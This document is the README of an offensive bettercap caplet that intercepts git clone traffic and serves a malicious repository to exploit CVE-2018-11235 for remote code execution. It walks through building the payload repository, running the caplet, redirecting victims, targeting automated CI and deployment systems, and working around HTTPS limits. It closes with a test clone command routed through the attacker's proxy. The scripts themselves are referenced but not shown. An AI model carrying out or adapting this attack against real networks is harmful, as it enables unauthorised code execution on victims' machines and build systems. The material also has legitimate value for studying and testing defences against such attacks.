This caplet is intercepting http/https git clone attempts and redirecting them to local http server that serves a malicious repository leading to exploitation of CVE-2018-11235 on vulnerable client.
- Create a malicious repository with
build_repo.shscript. The script will take the contents ofpayload.txtas payload - customize the payload file to your needs. - Run the caplet with:
bettercap -caplet caplets/gitspoof/gitspoof.cap
You can control to which repository redirect the victim, by changing
gitspoof.repo variable to an IP or domain (do not prefix with
http(s)). This way if the victim is not susceptible to CVE-2018-11235
you can still try to inject arbitrary code into the repo - this might
come in handy when trying to exploit some bad CI/deployment scripts.
Obviously the script won't be able to intercept https git clones
unless you can obtain a valid SSL cert or the victim used -c http.sslVerify=false configuration option.
The script was aimed at attacking automated systems not people therefore the repo layout doesn't try hard to look inconspicuous ;)
Attacking human with this caplet would require to also spoof some trusted domain and point it at bettercap server since Git will always notify the user about http redirect.
Finally - all the CVE-2018-11235 limitations apply - to get RCE the victim needs to have vulnerable git client and do a recursive git clone (or initialize the submodules afterwards).
You can test the script yourself without arp poison:
- Setup vulnerable git on your system
- Fire the caplet (remember to run
./build_repo.shfirst!) - On vulnerable system run:
http_proxy=<ip address of bettercap machine><bettercap_http_port> git clone --recursive http://github.com/bettercap/bettercap /tmp/exploit
(NOTE: we are intentionally trying to clone via http on github)
The clone should trigger the default payload.